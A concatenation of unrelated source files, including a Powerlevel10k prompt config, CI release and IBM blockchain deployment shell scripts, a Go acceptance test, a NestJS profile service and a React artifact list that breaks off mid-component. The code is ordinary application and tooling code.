typeset -g POWERLEVEL9K_IP_INTERFACE='e.*'
# Custom icon.
# typeset -g POWERLEVEL9K_IP_VISUAL_IDENTIFIER_EXPANSION='⭐'
#########################[ proxy: system-wide http/https/ftp proxy ]##########################
# Proxy color.
# typeset -g POWERLEVEL9K_PROXY_FOREGROUND=4
# typeset -g POWERLEVEL9K_PROXY_BACKGROUND=0
# Custom icon.
# typeset -g POWERLEVEL9K_PROXY_VISUAL_IDENTIFIER_EXPANSION='⭐'
################################[ battery: internal battery ]#################################
# Show battery in red when it's below this level and not connected to power supply.
typeset -g POWERLEVEL9K_BATTERY_LOW_THRESHOLD=20
typeset -g POWERLEVEL9K_BATTERY_LOW_FOREGROUND=1
# Show battery in green when it's charging or fully charged.
typeset -g POWERLEVEL9K_BATTERY_{CHARGING,CHARGED}_FOREGROUND=2
# Show battery in yellow when it's discharging.
typeset -g POWERLEVEL9K_BATTERY_DISCONNECTED_FOREGROUND=3
# Battery pictograms going from low to high level of charge.
typeset -g POWERLEVEL9K_BATTERY_STAGES='\uf58d\uf579\uf57a\uf57b\uf57c\uf57d\uf57e\uf57f\uf580\uf581\uf578'
# Don't show the remaining time to charge/discharge.
typeset -g POWERLEVEL9K_BATTERY_VERBOSE=false
# typeset -g POWERLEVEL9K_BATTERY_BACKGROUND=0
#####################################[ wifi: wifi speed ]#####################################
# WiFi color.
# typeset -g POWERLEVEL9K_WIFI_FOREGROUND=0
# typeset -g POWERLEVEL9K_WIFI_BACKGROUND=4
# Custom icon.
# typeset -g POWERLEVEL9K_WIFI_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Use different colors and icons depending on signal strength ($P9K_WIFI_BARS).
#
# # Wifi colors and icons for different signal strength levels (low to high).
# typeset -g my_wifi_fg=(0 0 0 0 0) # <-- change these values
# typeset -g my_wifi_icon=('WiFi' 'WiFi' 'WiFi' 'WiFi' 'WiFi') # <-- change these values
#
# typeset -g POWERLEVEL9K_WIFI_CONTENT_EXPANSION='%F{${my_wifi_fg[P9K_WIFI_BARS+1]}}$P9K_WIFI_LAST_TX_RATE Mbps'
# typeset -g POWERLEVEL9K_WIFI_VISUAL_IDENTIFIER_EXPANSION='%F{${my_wifi_fg[P9K_WIFI_BARS+1]}}${my_wifi_icon[P9K_WIFI_BARS+1]}'
#
# The following parameters are accessible within the expansions:
#
# Parameter | Meaning
# ----------------------+---------------
# P9K_WIFI_SSID | service set identifier, a.k.a. network name
# P9K_WIFI_LINK_AUTH | authentication protocol such as "wpa2-psk" or "none"; empty if unknown
# P9K_WIFI_LAST_TX_RATE | wireless transmit rate in megabits per second
# P9K_WIFI_RSSI | signal strength in dBm, from -120 to 0
# P9K_WIFI_NOISE | noise in dBm, from -120 to 0
# P9K_WIFI_BARS | signal strength in bars, from 0 to 4 (derived from P9K_WIFI_RSSI and P9K_WIFI_NOISE)
####################################[ time: current time ]####################################
# Current time color.
# typeset -g POWERLEVEL9K_TIME_FOREGROUND=0
# typeset -g POWERLEVEL9K_TIME_BACKGROUND=7
# Format for the current time: 09:51:02. See `man 3 strftime`.
typeset -g POWERLEVEL9K_TIME_FORMAT='%D{%H:%M:%S}'
# If set to true, time will update when you hit enter. This way prompts for the past
# commands will contain the start times of their commands as opposed to the default
# behavior where they contain the end times of their preceding commands.
typeset -g POWERLEVEL9K_TIME_UPDATE_ON_COMMAND=false
# Custom icon.
typeset -g POWERLEVEL9K_TIME_VISUAL_IDENTIFIER_EXPANSION=
# Custom prefix.
# typeset -g POWERLEVEL9K_TIME_PREFIX='at '
# Example of a user-defined prompt segment. Function prompt_example will be called on every
# prompt if `example` prompt segment is added to POWERLEVEL9K_LEFT_PROMPT_ELEMENTS or
# POWERLEVEL9K_RIGHT_PROMPT_ELEMENTS. It displays an icon and yellow text on red background
# greeting the user.
#
# Type `p10k help segment` for documentation and a more sophisticated example.
function prompt_example() {
p10k segment -b 1 -f 3 -i '⭐' -t 'hello, %n'
}
# User-defined prompt segments may optionally provide an instant_prompt_* function. Its job
# is to generate the prompt segment for display in instant prompt. See
# https://github.com/romkatv/powerlevel10k/blob/master/README.md#instant-prompt.
#
# Powerlevel10k will call instant_prompt_* at the same time as the regular prompt_* function
# and will record all `p10k segment` calls it makes. When displaying instant prompt, Powerlevel10k
# will replay these calls without actually calling instant_prompt_*. It is imperative that
# instant_prompt_* always makes the same `p10k segment` calls regardless of environment. If this
# rule is not observed, the content of instant prompt will be incorrect.
#
# Usually, you should either not define instant_prompt_* or simply call prompt_* from it. If
# instant_prompt_* is not defined for a segment, the segment won't be shown in instant prompt.
function instant_prompt_example() {
# Since prompt_example always makes the same `p10k segment` calls, we can call it from
# instant_prompt_example. This will give us the same `example` prompt segment in the instant
# and regular prompts.
prompt_example
}
# User-defined prompt segments can be customized the same way as built-in segments.
# typeset -g POWERLEVEL9K_EXAMPLE_FOREGROUND=3
# typeset -g POWERLEVEL9K_EXAMPLE_VISUAL_IDENTIFIER_EXPANSION='⭐'
# Transient prompt works similarly to the builtin transient_rprompt option. It trims down prompt
# when accepting a command line. Supported values:
#
# - off: Don't change prompt when accepting a command line.
# - always: Trim down prompt when accepting a command line.
# - same-dir: Trim down prompt when accepting a command line unless this is the first command
# typed after changing current working directory.
typeset -g POWERLEVEL9K_TRANSIENT_PROMPT=always
# Instant prompt mode.
#
# - off: Disable instant prompt. Choose this if you've tried instant prompt and found
# it incompatible with your zsh configuration files.
# - quiet: Enable instant prompt and don't print warnings when detecting console output
# during zsh initialization. Choose this if you've read and understood
# https://github.com/romkatv/powerlevel10k/blob/master/README.md#instant-prompt.
# - verbose: Enable instant prompt and print a warning when detecting console output during
# zsh initialization. Choose this if you've never tried instant prompt, haven't
# seen the warning, or if you are unsure what this all means.
typeset -g POWERLEVEL9K_INSTANT_PROMPT=quiet
# Hot reload allows you to change POWERLEVEL9K options after Powerlevel10k has been initialized.
# For example, you can type POWERLEVEL9K_BACKGROUND=red and see your prompt turn red. Hot reload
# can slow down prompt by 1-2 milliseconds, so it's better to keep it turned off unless you
# really need it.
typeset -g POWERLEVEL9K_DISABLE_HOT_RELOAD=true
# If p10k is already loaded, reload configuration.
# This works even with POWERLEVEL9K_DISABLE_HOT_RELOAD=true.
(( ! $+functions[p10k] )) || p10k reload
}
# Tell `p10k configure` which file it should overwrite.
typeset -g POWERLEVEL9K_CONFIG_FILE=${${(%):-%x}:a}
(( ${#p10k_config_opts} )) && setopt ${p10k_config_opts[@]}
'builtin' 'unset' 'p10k_config_opts'
|
<reponame>appigram/windmill-react-ui
import React from 'react';
interface Props extends React.TdHTMLAttributes<HTMLTableCellElement> {
}
declare const TableCell: React.ForwardRefExoticComponent<Props & React.RefAttributes<HTMLTableCellElement>>;
export default TableCell;
//# sourceMappingURL=TableCell.d.ts.map |
// Source : https://leetcode.com/problems/sum-root-to-leaf-numbers/
// Author : <NAME>
/**
* Definition for a binary tree node.
* function TreeNode(val) {
* this.val = val;
* this.left = this.right = null;
* }
*/
/**
* @param {TreeNode} root
* @return {number}
*/
// Running total of all root-to-leaf numbers for the current sumNumbers call
// (module level so the recursive helper can accumulate into it).
var ans;

/**
 * Depth-first walk that accumulates the number formed along each
 * root-to-leaf path into `ans`.
 *
 * @param root current (non-null) tree node
 * @param sum  number built from the ancestors of `root`
 */
function dfs(root, sum) {
    var pathValue = sum * 10 + root.val;
    // Leaf reached: the completed path number joins the running total.
    if (!root.left && !root.right) {
        ans += pathValue;
        return;
    }
    if (root.left) dfs(root.left, pathValue);
    if (root.right) dfs(root.right, pathValue);
}

/**
 * @param {TreeNode} root
 * @return {number} sum of all numbers spelled by root-to-leaf paths
 */
var sumNumbers = function(root) {
    if (root === null) return 0;
    ans = 0;
    dfs(root, 0);
    return ans;
};
|
#!/bin/bash
# Configure the git identity from CI environment variables and, when the last
# commit carries a release tag, record it in .version and push the release.

if [ -n "$EMAIL" ]; then
  git config user.email "$EMAIL"
fi
# NOTE(review): gating user.name on PASSWORD (rather than a NAME variable)
# looks unintentional -- confirm which variable should control this.
if [ -n "$PASSWORD" ]; then
  git config user.name "Travis Ci"
fi

# Extract a numeric release tag (e.g. 'tag: 1.2.3') from the latest commit's
# decoration. Declared and exported separately so a failing command
# substitution is not masked (shellcheck SC2155).
TAG=$(git log -1 | grep -Eo 'tag: ([0-9\.]+)' | cut -d' ' -f2)
export TAG

if [ -n "$TAG" ]; then
  # Fix: GitHub's git host is github.com; the original pointed at github.org.
  git remote set-url origin "https://brunodles:${PASSWORD}@github.com/brunodles/java-validation.git"
  echo -n "$TAG" > .version
  git commit -am "Prepare release $TAG"
  # Quote the tag so an unexpected empty/whitespace value cannot word-split.
  git tag "$TAG"
  git push origin "$TAG"
  git push origin master
fi
|
import os
import errno
def is_process_running(pid):
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
return True |
<reponame>ismetguzelgun/cooking-js<gh_stars>0
//v1
a = 2;
var a;
console.log( a );
//v1 changes into
var a;
a = 2;
console.log( a );
//v2
console.log( a );
var a = 2;
//v2 changes into
var a;
console.log( a );
a = 2;
//v1 vs. v2
/**
 * (Translated from Turkish.)
 * JS hoists only the declarations:
 * in the first example `var a` is moved above `a = 2`,
 * while the console.log stays where it is, so the code logs 2.
 *
 * In the v2 example `var a` is hoisted to the top, but the console.log
 * just below it is not hoisted, so it prints undefined;
 * only afterwards is the value 2 assigned to `a`.
 * https://www.freecodecamp.org/news/what-is-variable-hoisting-differentiating-between-var-let-and-const-in-es6-f1a70bb43d/
 */
|
package acceptance
import (
"github.com/onsi/gomega/ghttp"
"net/http"
"os/exec"
"github.com/onsi/gomega/gbytes"
"github.com/onsi/gomega/gexec"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
)
// Acceptance test for the `delete-installation` CLI command: a stubbed Ops
// Manager API is stood up with ghttp, the binary is executed against it, and
// the emitted log lines are asserted on.
var _ = Describe("delete-installation command", func() {
	var (
		server *ghttp.Server
	)
	BeforeEach(func() {
		// createTLSServer is provided elsewhere in this test suite.
		server = createTLSServer()
		// Handlers are consumed in order: kick off the deletion, then two
		// rounds of status + log polling (running -> succeeded).
		server.AppendHandlers(
			ghttp.VerifyRequest("GET", "/api/v0/installations"),
			ghttp.CombineHandlers(
				ghttp.VerifyRequest("DELETE", "/api/v0/installation_asset_collection"),
				ghttp.RespondWith(http.StatusOK, `{"install": {"id": 42}}`),
			),
			ghttp.CombineHandlers(
				ghttp.VerifyRequest("GET", "/api/v0/installations/42"),
				ghttp.RespondWith(http.StatusOK, `{ "status": "running" }`),
			),
			ghttp.CombineHandlers(
				ghttp.VerifyRequest("GET", "/api/v0/installations/42/logs"),
				ghttp.RespondWith(http.StatusOK, `{ "logs": "call #0\n"}`),
			),
			ghttp.CombineHandlers(
				ghttp.VerifyRequest("GET", "/api/v0/installations/42"),
				ghttp.RespondWith(http.StatusOK, `{ "status": "succeeded" }`),
			),
			ghttp.CombineHandlers(
				ghttp.VerifyRequest("GET", "/api/v0/installations/42/logs"),
				ghttp.RespondWith(http.StatusOK, `{ "logs": "call #0\ncall #1"}`),
			),
		)
	})
	AfterEach(func() {
		server.Close()
	})
	It("successfully deletes the installation on the Ops Manager", func() {
		// pathToMain points at the compiled CLI binary (built in suite setup).
		command := exec.Command(pathToMain,
			"--target", server.URL(),
			"--username", "some-username",
			"--password", "<PASSWORD>",
			"--skip-ssl-validation",
			"delete-installation",
			"--force")
		session, err := gexec.Start(command, GinkgoWriter, GinkgoWriter)
		Expect(err).ToNot(HaveOccurred())
		Eventually(session, "5s").Should(gexec.Exit(0))
		// Log lines must appear in order: banner, then each polled log chunk.
		Expect(session.Out).To(gbytes.Say("attempting to delete the installation on the targeted Ops Manager"))
		Expect(session.Out).To(gbytes.Say("call #0"))
		Expect(session.Out).To(gbytes.Say("call #1"))
	})
})
|
import io
# Google Cloud Platform
from google.cloud import speech_v1
from google.cloud.speech_v1 import enums

# Audio configuration: 44.1 kHz, mono, US English.
sample_rate_hertz = 44100
channels = 1
language_code = 'en-US'

client = speech_v1.SpeechClient()

# Set audio encoding (raw 16-bit little-endian PCM, i.e. WAV payload).
encoding = enums.RecognitionConfig.AudioEncoding.LINEAR16
config = {
    "sample_rate_hertz": sample_rate_hertz,
    "language_code": language_code,
    "encoding": encoding,
    "audio_channel_count": channels,
}

# Read audio file
filename = 'audio.wav'
with open(filename, 'rb') as read_file:
    content = read_file.read()

# Fix: the v1 recognize API expects a RecognitionAudio message/dict, not raw
# bytes -- wrap the file contents in {"content": ...}.
audio = {"content": content}

# Execute voice recognition
response = client.recognize(config, audio)

# Print the top alternative of each recognized segment.
for result in response.results:
    print('Transcript: {}'.format(result.alternatives[0].transcript))
#!/usr/bin/env bash
# Common IBM blockchain platform functions, e.g. to provision a blockchain service
# shellcheck disable=2086
# shellcheck source=src/common/utils.sh
source "${SCRIPT_DIR}/common/utils.sh"
#######################################
# Setup constants for bluemix cloud foundry interaction
# Globals:
# get: REGION_ID
# set: BLOCKCHAIN_SERVICE_NAME
# set: BLOCKCHAIN_SERVICE_PLAN
# set: BLOCKCHAIN_SERVICE_KEY
# Arguments:
# None
# Returns:
# None
#######################################
function setup_service_constants {
  # The region instance is the second ':'-separated field of REGION_ID;
  # 'ys1' designates the staging environment, anything else is production.
  local region_instance
  region_instance=$(echo "$REGION_ID" | cut -d : -f 2)
  local stage="prod"
  if [ "${region_instance}" = "ys1" ]; then
    stage="staging"
  fi
  # Service name/plan differ only by the staging/prod suffix.
  BLOCKCHAIN_SERVICE_NAME="ibm-blockchain-5-${stage}"
  BLOCKCHAIN_SERVICE_PLAN="ibm-blockchain-plan-v1-ga1-starter-${stage}"
  export BLOCKCHAIN_SERVICE_KEY="Credentials-1"
  export BLOCKCHAIN_SERVICE_NAME
  export BLOCKCHAIN_SERVICE_PLAN
}
#######################################
# Update network credentials to reflect targeted 'org' argument using 'blockchain.json'
# Globals:
# set: BLOCKCHAIN_SECRET
# set: BLOCKCHAIN_KEY
# set: BLOCKCHAIN_API
# Arguments:
# org: must match a top-level key in 'blockchain.json'
# Returns:
# None
#######################################
function authenticate_org {
  # Pull the named org's credentials out of blockchain.json and publish them
  # through the BLOCKCHAIN_* globals consumed by the curl helpers.
  local org="$1"
  local file="blockchain.json"
  local network_id url
  network_id=$(jq --raw-output ".${org}.network_id" "${file}")
  url=$(jq --raw-output ".${org}.url" "${file}")
  BLOCKCHAIN_KEY=$(jq --raw-output ".${org}.key" "${file}")
  BLOCKCHAIN_SECRET=$(jq --raw-output ".${org}.secret" "${file}")
  # Base URL for all subsequent IBM Blockchain platform API calls.
  BLOCKCHAIN_API="${url}/api/v1/networks/${network_id}"
}
#######################################
# Populate 'blockchain.json' with network credentials by interacting with the
# bluemix cloud foundry CLI to create/modify service instance and key
# Globals:
# get: BLOCKCHAIN_SERVICE_INSTANCE
# get: BLOCKCHAIN_SERVICE_NAME
# get: BLOCKCHAIN_SERVICE_PLAN
# get: BLOCKCHAIN_SERVICE_KEY
# Arguments:
# None
# Returns:
# None
#######################################
function provision_blockchain {
  # Create (or reuse) the blockchain service instance and its service key via
  # the Cloud Foundry CLI; each step aborts the script on failure.
  cf create-service "${BLOCKCHAIN_SERVICE_NAME}" "${BLOCKCHAIN_SERVICE_PLAN}" "${BLOCKCHAIN_SERVICE_INSTANCE}" || error_exit "Error creating blockchain service"
  cf create-service-key "${BLOCKCHAIN_SERVICE_INSTANCE}" "${BLOCKCHAIN_SERVICE_KEY}" || error_exit "Error creating blockchain service key"
  local blockchain_service_key
  blockchain_service_key=$(cf service-key "${BLOCKCHAIN_SERVICE_INSTANCE}" "${BLOCKCHAIN_SERVICE_KEY}") || error_exit "Error retrieving blockchain service key"
  # 'cf service-key' prefixes its JSON output with a banner line; strip it
  # before writing the credentials file.
  echo "$blockchain_service_key" | tail -n +2 > blockchain.json
}
#######################################
# Helper for get_blockchain_connection_profile
# Globals:
# get: BLOCKCHAIN_KEY
# get: BLOCKCHAIN_SECRET
# get: BLOCKCHAIN_API
# Arguments:
# None
# Returns:
# None
#######################################
function get_blockchain_connection_profile_inner {
  # Single fetch of the connection profile, authenticated with the org's
  # key/secret, written to blockchain-connection-profile.json.
  do_curl \
    -H 'Content-Type: application/json' \
    -H 'Accept: application/json' \
    -u "${BLOCKCHAIN_KEY}:${BLOCKCHAIN_SECRET}" \
    "${BLOCKCHAIN_API}/connection_profile" > blockchain-connection-profile.json
}
#######################################
# Requests and waits for network information from the IBM Blockchain platform
# api, outputting into 'blockchain-connection-profile.json'
# Globals:
# None
# Arguments:
# None
# Returns:
# None
#######################################
function get_blockchain_connection_profile {
  # Fetch once, then poll every 10s until the profile contains the default
  # channel -- the signal that the network is ready for use.
  get_blockchain_connection_profile_inner
  until jq -e ".channels.defaultchannel" blockchain-connection-profile.json
  do
    sleep 10
    get_blockchain_connection_profile_inner
  done
}
#######################################
# Installs chaincode file with specified id and version
# Globals:
# get: BLOCKCHAIN_API
# get: BLOCKCHAIN_KEY
# get: BLOCKCHAIN_SECRET
# Arguments:
# CC_ID: Name to label installation with
# CC_VERSION: Version to label installation with
# CC_PATH: Path to chaincode directory to be installed
# CC_TYPE: Type of chaincode to install (golang|node)
# Returns:
# err_no:
# 2 = chaincode exists with specified id and version
# 1 = unrecognized error returned by IBM Blockchain platform api
# 0 = chaincode successfully installed with specified id and version
#######################################
function install_fabric_chaincode {
  local CC_ID=$1
  local CC_VERSION=$2
  local CC_PATH=$3
  local CC_TYPE=$4
  local CHAINCODE_FILES
  echo "Installing chaincode '$CC_PATH' with id '$CC_ID' and version '$CC_VERSION'..."
  # Collect every non-test file under the chaincode directory and turn each
  # one into a curl multipart 'files[]' upload option.
  CHAINCODE_FILES=$(find ${CC_PATH} -type f ! -name "*test*")
  CHAINCODE_FILE_OPTS=""
  for CHAINCODE_FILE in ${CHAINCODE_FILES}
  do
    CHAINCODE_FILE_OPTS="${CHAINCODE_FILE_OPTS} -F files[]=@${CHAINCODE_FILE}"
  done
  OUTPUT=$(do_curl \
    -X POST \
    -u "${BLOCKCHAIN_KEY}:${BLOCKCHAIN_SECRET}" \
    $CHAINCODE_FILE_OPTS \
    -F chaincode_id="${CC_ID}" -F chaincode_version="${CC_VERSION}" \
    -F chaincode_type="${CC_TYPE}" \
    "${BLOCKCHAIN_API}/chaincode/install")
  # NOTE(review): this checks for exit status exactly 1, relying on do_curl's
  # convention of returning 1 on failure -- confirm against utils.sh.
  if [ $? -eq 1 ]
  then
    echo "Failed to install fabric contract:"
    # Distinguish "already installed" (recoverable, err 2) from anything else.
    if [[ "${OUTPUT}" == *"chaincode code"*"exists"* ]]
    then
      echo "Chaincode already installed with id '${CC_ID}' and version '${CC_VERSION}'"
      return 2
    else
      echo "Unrecognized error returned:"
      echo "$OUTPUT"
      return 1
    fi
  fi
  echo "Successfully installed fabric contract."
  return 0
}
#######################################
# Instantiates chaincode object with specified id and version in target channel,
# using optional initial arguments
# Globals:
# get: BLOCKCHAIN_API
# get: BLOCKCHAIN_KEY
# get: BLOCKCHAIN_SECRET
# Arguments:
# CC_ID: Name to label instance with
# CC_VERSION: Version to label instance with
# CC_TYPE: Type of chaincode to instantiate (golang|node)
# CHANNEL: Channel for instance to be constructed in
# INIT_ARGS: (optional) Constructor arguments
# Returns:
# err_no:
# 2 = chaincode instance exists with specified id and version
# 1 = unrecognized error returned by IBM Blockchain platform api
# 0 = chaincode successfully instantiated with specified id and version
#######################################
function instantiate_fabric_chaincode {
  local CC_ID=$1
  local CC_VERSION=$2
  local CC_TYPE=$3
  local CHANNEL=$4
  local INIT_ARGS=$5
  # Build the JSON request body; INIT_ARGS is expected to already be a
  # comma-separated list of JSON strings.
  cat << EOF > request.json
{
"chaincode_id": "${CC_ID}",
"chaincode_version": "${CC_VERSION}",
"chaincode_type": "${CC_TYPE}",
"chaincode_arguments": [${INIT_ARGS}]
}
EOF
  echo "Instantiating fabric contract with id '$CC_ID' version '$CC_VERSION' and chaincode type '$CC_TYPE' on channel '$CHANNEL' with arguments '$INIT_ARGS'..."
  OUTPUT=$(do_curl \
    -X POST \
    -H 'Content-Type: application/json' \
    -u "${BLOCKCHAIN_KEY}:${BLOCKCHAIN_SECRET}" \
    --data-binary @request.json \
    "${BLOCKCHAIN_API}/channels/${CHANNEL}/chaincode/instantiate")
  # Capture the curl status before rm can clobber $?.
  local do_curl_status=$?
  rm -f request.json
  # Known-transient gateway errors: wait and retry the whole call with the
  # original arguments (unbounded retry by design).
  if [[ "${OUTPUT}" == *"Failed to establish a backside connection"* || "${OUTPUT}" == *"premature execution"* ]]
  then
    echo "Connection problem encountered, delaying 30s and trying again..."
    sleep 30
    instantiate_fabric_chaincode "$@"
    return $?
  fi
  # NOTE(review): as in install_fabric_chaincode, this assumes do_curl
  # returns exactly 1 on failure.
  if [ $do_curl_status -eq 1 ]
  then
    echo "Failed to instantiate fabric contract:"
    # "already exists" is the recoverable case (err 2).
    if [[ "${OUTPUT}" == *"version already exists for chaincode"* ]]
    then
      echo "Chaincode instance already exists with id '${CC_ID}' version '${CC_VERSION}' and chaincode type '$CC_TYPE'"
      return 2
    else
      echo "Unrecognized error returned:"
      echo "${OUTPUT}"
      return 1
    fi
  fi
  echo "Successfully instantiated fabric contract."
  return 0
}
#######################################
# Parses deployment configuration and makes corresponding install and
# instatiate requests
# Globals:
# None
# Arguments:
# CC_TYPE: Type of chaincode to deploy (golang|node)
# DEPLOY_CONFIG: path to json config file
# Returns:
# None
#######################################
function deploy_fabric_chaincode {
  local CC_TYPE=$1
  local DEPLOY_CONFIG=$2
  echo "Parsing deployment configuration:"
  cat "$DEPLOY_CONFIG"
  # Top-level keys of the config are org names; authenticate against each one
  # in turn before deploying its chaincode entries.
  for org in $(jq -r "to_entries[] | .key" "$DEPLOY_CONFIG")
  do
    echo "Targeting org '$org'..."
    authenticate_org "$org"
    local cc_index=0
    # NOTE(review): the pipe puts this while-loop in a subshell -- cc_index
    # increments persist across iterations, but nothing set inside the loop
    # survives past 'done'.
    jq -r ".${org}.chaincode[].path" "$DEPLOY_CONFIG" | while read -r CC_PATH
    do
      CC_NAME=$(jq -r ".${org}.chaincode[$cc_index].name" "$DEPLOY_CONFIG")
      CC_INSTALL=$(jq -r ".${org}.chaincode[$cc_index].install" "$DEPLOY_CONFIG")
      CC_INSTANTIATE=$(jq -r ".${org}.chaincode[$cc_index].instantiate" "$DEPLOY_CONFIG")
      CC_CHANNELS=$(jq -r ".${org}.chaincode[$cc_index].channels[]" "$DEPLOY_CONFIG")
      CC_INIT_ARGS=$(jq ".${org}.chaincode[$cc_index].init_args[]" "$DEPLOY_CONFIG")
      # TODO: Integrate with configuration
      CC_ID="${CC_NAME}"
      # Version is timestamp + CI build number so every deploy is unique.
      CC_VERSION="$(date '+%Y%m%d%H%M%S')-${BUILD_NUMBER}"
      if $CC_INSTALL
      then
        install_fabric_chaincode $CC_ID $CC_VERSION $CC_PATH $CC_TYPE
        # If install failed due to a reason other than an identical version already exists, skip instantiate
        if [ $? -eq 1 ]; then
          continue
        fi
      fi
      if $CC_INSTANTIATE
      then
        # Instantiate once per configured channel.
        for channel in $CC_CHANNELS
        do
          instantiate_fabric_chaincode $CC_ID $CC_VERSION $CC_TYPE $channel $CC_INIT_ARGS
        done
      fi
      cc_index=$((cc_index + 1))
    done
  done
  echo "Done parsing deployment configuration."
}
|
/* eslint-disable @typescript-eslint/no-var-requires */
import { HttpCode, HttpException, HttpStatus, Injectable } from '@nestjs/common';
const bcrypt = require('bcrypt');
import { PrismaService } from '../Prisma/prisma.service';
import { users, usersCreateInput, usersWhereUniqueInput } from '@prisma/client';
import { AccountOverViewResponseDTO } from './profile.dto';
import { authService } from 'src/auth/auth.service';
@Injectable()
export class ProfileService {
constructor(private prisma: PrismaService,private auth: authService) {}
async getAccountOverView(userID): Promise<AccountOverViewResponseDTO> {
const user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
return this.serialiseUserData(user);
}
async updateAccountDetails(userID,updatedDetails: any): Promise<users> {
let user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
if(!user) throw new HttpException({
code : 404,
error : "USER NOT FOUND"
},HttpStatus.NOT_FOUND)
user = await this.prisma.users.update({
where : {
id: userID as string,
},
data : {
email : updatedDetails.email,
dob : updatedDetails.dob,
gender : updatedDetails.gender
}
})
return user;
}
async changePassword(userID,oldPassword: string, newPassword: string): Promise<any> {
const user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
const verified = await this.auth.verifyUser(user,oldPassword);
if(verified){
const newHashedPassword = await this.auth.getHashPassword(newPassword);
await this.prisma.users.update({
where : {
id : user.id,
},
data : {
password : <PASSWORD>
}
})
return {
success : true,
message : 'password changed !'
}
}
throw new HttpException({
code : HttpStatus.NOT_ACCEPTABLE,
error : "password incorrect !"
},HttpStatus.NOT_ACCEPTABLE)
}
async canChangePassword(userID: string) : Promise<boolean>{
const user = await this.prisma.users.findOne({
where: {
id: userID as string,
},
});
if(!user) throw new HttpException({
code : 404,
error : "USER NOT FOUND"
},HttpStatus.NOT_FOUND)
return user.authtype === 'local'
}
serialiseUserData (user: users): AccountOverViewResponseDTO{
return {
userName : user.name,
email : user.email,
dob : user.dob.toLocaleString().split(',')[0],
gender : user.gender,
editable : user.authtype === 'local'
}
}
}
|
def most_frequent_letter(word, letters):
    """Return the index in ``word`` of the letter from ``letters`` that occurs
    most often in ``word`` (first such letter in ``letters`` wins ties).

    Returns -1 (str.find semantics) if the winning candidate never appears
    in ``word``.
    """
    # Frequency of each candidate letter within the word.
    frequency = {letter: word.count(letter) for letter in letters}
    # First candidate (in `letters` order) with the highest count -- same
    # tie-breaking as the original values().index(max) dance.
    best = max(frequency, key=frequency.get)
    return word.find(best)

# Fix: the original demo referenced an undefined name `letters`; pass the
# candidate letters explicitly.
print(most_frequent_letter('hello', 'hel'))  # 2
import React from 'react';
import { connect } from 'react-redux';
import { Link } from 'react-router-dom';
import Dropzone from 'react-dropzone';
import ReactTooltip from 'react-tooltip';
// material ui
import { Button, Tooltip, Typography } from '@material-ui/core';
import { Help as HelpIcon, Sort as SortIcon } from '@material-ui/icons';
import { setSnackbar } from '../../actions/appActions';
import { editArtifact, uploadArtifact, selectArtifact, selectRelease } from '../../actions/releaseActions';
import { preformatWithRequestID, customSort } from '../../helpers';
import { ExpandArtifact } from '../helptips/helptooltips';
import Loader from '../common/loader';
import ReleaseRepositoryItem from './releaserepositoryitem';
import { getOnboardingComponentFor, advanceOnboarding, getOnboardingStepCompleted } from '../../utils/onboardingmanager';
// Header metadata for the artifact table; `sortable` drives whether
// ReleaseRepository._sortColumn reacts to a click on the column.
const columnHeaders = [
  { title: 'Device type compatibility', name: 'device_types', sortable: false },
  { title: 'Last modified', name: 'modified', sortable: true },
  { title: 'Type', name: 'type', sortable: false },
  { title: 'Size', name: 'size', sortable: true }
];
/**
 * Artifact listing for the currently selected release: renders the sortable
 * artifact table, the "create deployment" shortcut, the upload dropzone for
 * the empty state, and the onboarding tooltips anchored to those elements.
 */
export class ReleaseRepository extends React.Component {
  constructor(props, context) {
    super(props, context);
    this.state = {
      popupLabel: 'Upload a new artifact',
      sortCol: 'modified',
      sortDown: true,
      tmpFile: null,
      upload: false,
      wasSelectedRecently: false
    };
  }
  // Briefly flag a change of selected release so render() shows a loader for
  // 200ms while the artifact list swaps over.
  componentDidUpdate(prevProps) {
    if (prevProps.release && this.props.release && prevProps.release.Name !== this.props.release.Name) {
      const self = this;
      self.setState({ wasSelectedRecently: true }, () => setTimeout(() => self.setState({ wasSelectedRecently: false }), 200));
    }
  }
  // Dropzone callback: upload the first accepted file; explain rejections
  // (only .mender files are expected) via the snackbar.
  onDrop(acceptedFiles, rejectedFiles) {
    if (acceptedFiles.length) {
      this.props.onUpload(acceptedFiles[0]);
    }
    if (rejectedFiles.length) {
      this.props.setSnackbar(`File '${rejectedFiles[0].name}' was rejected. File should be of type .mender`, null);
    }
  }
  // Toggle artifact expansion: clicking the already-selected artifact
  // deselects it (selectArtifact with no argument collapses the row).
  _onRowSelection(artifact) {
    if (!artifact || !this.props.selectedArtifact || this.props.selectedArtifact.id !== artifact.id) {
      this.props.selectArtifact(artifact);
    } else {
      this.props.selectArtifact();
    }
    if (!this.props.onboardingComplete) {
      advanceOnboarding('artifact-included-onboarding');
    }
  }
  // Persist an edited artifact description, then refresh the artifact list.
  _editArtifactData(id, description) {
    var self = this;
    return self.props
      .editArtifact(id, { description })
      .then(() => {
        self.props.setSnackbar('Artifact details were updated successfully.', 5000, '');
        self.props.refreshArtifacts();
      })
      .catch(err => {
        // NOTE(review): assumes err.res (and err.res.body) are always present
        // on failure -- confirm against the action's error shape.
        const errMsg = err.res.body.error || '';
        self.props.setSnackbar(preformatWithRequestID(err.res, `Artifact details couldn't be updated. ${errMsg || err.error}`), null, 'Copy to clipboard');
      });
  }
  // Advance onboarding (when applicable) and stage this release for the
  // deployment-creation flow the linked button navigates to.
  onCreateDeploymentFrom(release) {
    if (!this.props.onboardingComplete && getOnboardingStepCompleted('upload-new-artifact-tip')) {
      advanceOnboarding('artifact-modified-onboarding');
    }
    this.props.selectRelease(release);
  }
  // Flip the sort direction (or switch the sort column) for sortable headers.
  _sortColumn(col) {
    if (!col.sortable) {
      return;
    }
    // sort table
    this.setState({ sortDown: !this.state.sortDown, sortCol: col.name });
  }
  render() {
    const self = this;
    const { loading, onUpload, release, releases, selectedArtifact, showHelptips, uploading } = self.props;
    const { sortCol, sortDown, wasSelectedRecently } = self.state;
    const artifacts = release ? release.Artifacts : [];
    // One expandable row per artifact, sorted by the active column.
    const items = artifacts.sort(customSort(sortDown, sortCol)).map((pkg, index) => {
      const expanded = !!(selectedArtifact && selectedArtifact.id === pkg.id);
      return (
        <ReleaseRepositoryItem
